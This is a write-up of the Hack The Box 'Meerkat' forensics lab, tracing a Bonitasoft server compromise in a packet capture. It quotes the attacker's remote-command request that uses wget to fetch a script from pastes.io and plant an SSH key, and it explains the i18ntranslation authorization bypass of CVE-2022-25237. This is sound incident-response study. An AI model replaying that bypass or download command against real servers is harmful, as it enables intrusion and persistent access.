Meerkat Write Up — Hack The Box
Hi, in this time I want to share how I solve Meerkat Sherlocks from Hack The Box. I hope this write up will help you to understand how to solve this lab.
TLDR: Meerkat is one of Hack The Box labs. This case will give you network log file inside the pcap file. You have to find each flag to answer the question in the HTB portal. If you want to get to the Meerkat portal just click this link.
- We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?
The asked flag is the name of application running. Usually, apps using several ports, in here I tried to use http && tcp.port = =8080 filter to show the http packet traffic using 8080 port.
Inside the showing traffic info, a lot of http packets that show “login” information to bonita. One of those packets contains an information that bonita has a portal to login into it.
If we search at google, bonita portal is one of bonitasoft page to login into bonita application. Bonitasoft is a software company that offers the Bonita platform, a business process management (BPM) software.
Flag : BonitaSoft.
2. We believe the attacker may have used a subset of the brute forcing attack category — what is the name of the attack carried out?
From the http traffic, looks like a lot of login request to bonita apps.
If you ses HTTP form value from several packets with parameter info “POST POST /bonita/loginservice HTTP/1.1 (application/x-www-form-urlencoded)”, it found that attacker was trying to brute force using different credentials, but, with a same domain email on the username, i.e. “forela.co.uk”.
Probably, the attacker brute forcing using credential list that have been breached from the other sites, that contain the same credentials as forela.co.uk sites. This brute force attack can be called Credential Stuffing.
Flag : Credential Stuffing.
3. Does the vulnerability exploited have a CVE assigned — and if so, which one?
After the attacker successfully logged, pcap traffic shows that the attacker trying to upload a file via API url pageUpload.
I tried to check the tcp stream from that traffic and found that the attacker trying to upload zip file named “rce_api_extension.zip”.
The attacker also tried to access the uploaded extension using “whoami” command at cmd. Can be concluded that the attacker successfully granted the remote access inside the PC target.
Based on the analysis above, the attacker is using the API to bypass the upload and access the target PC remotely through the rce_api_extension.zip file.
I conducted a search and found that Bonitasoft once had an Authorization Bypass and RCE vulnerability that allowed users to add strings to the API URL and access privileged API endpoints. This could lead to Remote Code Execution (RCE) access by abusing privileged APIs to the server.
Flag : CVE-2022–25237
4. Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit?
The following is the API URL that the attacker uses to bypass the authorization by uploading files.
There is an additional string, namely “i18ntranslation” in the API URL. Referring to CVE-2022–25237, this string is used as an exception Pattern parameter for bypassing authorization filters.
Flag : i18ntranslation
5. How many combinations of usernames and passwords were used in the credential stuffing attack?
In the POST http traffic, you can see a lot of requests for login attempts.
Click on one of the packages and look into the HTML Form URL Encoded details. This detail displays the values of the username and password used for the login attempt.
Here, I want to make the value of the username a packet filter. Right click the Value of the username and click apply as column.
Next a column will appear containing values, here I try to choose a different username value. A total of 55 packages has different username combinations.
If you add 1 value to the last credential combination from the package list that appears, the total combination is 56.
Flag : 56
6. Which username and password combination was successful?
In the value of the previous HTTP POST filer, the attacker uses these credentials repeatedly, unlike other credential combinations. So it can be concluded that the username combination is the correct credential and ultimately allows the attacker to log into the system.
If you look at the TCP stream packet that includes the PageUpload API URL, you can find the username and password combination that was successfully used by the attacker to log in.
Flag : seb.broom@forela.co.uk:g0vernm3nt
7. If any, which text sharing site did the attacker utilise?
In one of the HTTP packages, there is information about the package which includes the command:
/bonita/API/extension/rce?p=0&c=1&cmd=wget%20https://pastes.io/raw/bx5gcr0et8This command is intended to download and run scripts from the pastes.io link, a website that functions as an online repository for text and code.
Flag : pastes.io
8. Please provide the filename of the public key used by the attacker to gain persistence on our host.
If the URL link https://pastes.io/raw/bx5gcr0et8 is opened, the contents of the following script will be displayed.
The script is intended to download the contents of the content in https://pastes.io/raw/hffgra4unv then add it to the ssh folder “/home/ubuntu/.ssh/authorized_keys”. If the link is opened, the public key will appear which the attacker will use to gain SSH access to the system.
Flag : hffgra4unv
9. Can you confirmed the file modified by the attacker to gain persistence?
From the script in the file https://pastes.io/raw/bx5gcr0et8, it can be seen that the command in the link targets the ssh key file at:
/home/ubuntu/.ssh/authorized_keys
Flag : /home/ubuntu/.ssh/authorized_keys
10. Can you confirm the MITRE technique ID of this type of persistence mechanism?
In the type of attack in this incident, the attacker carried out authorization bypass using an SSH key downloaded via pastes.io then modified the authorized_keys in the user folder. If matched with the MITRE technique ID then the mechanism matches ID T1098.004.
Flag : T1098.004
